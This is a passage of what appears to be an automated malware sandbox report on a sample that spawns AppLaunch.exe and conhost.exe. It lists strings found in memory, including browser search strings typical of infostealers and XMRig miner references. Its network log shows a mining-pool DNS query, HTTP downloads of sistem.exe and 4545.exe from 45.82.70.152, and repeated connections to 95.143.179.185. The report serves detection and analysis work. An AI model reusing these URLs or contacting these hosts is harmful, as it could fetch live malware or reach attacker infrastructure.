                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, conhost.exe, 0000000B.00000002.747239669.000001B080001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735232254.000000000713C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabt
                  Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpString found in binary or memory: https://xmrig.com/wizard
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                  Source: unknownDNS traffic detected: queries for: mine.bmpool.org
                  Source: global trafficHTTP traffic detected: GET /cabura-cash.pw/sistem.exe HTTP/1.1Host: 45.82.70.152:7777Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cabura-cash.pw/4545.exe HTTP/1.1Host: 45.82.70.152:7777
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
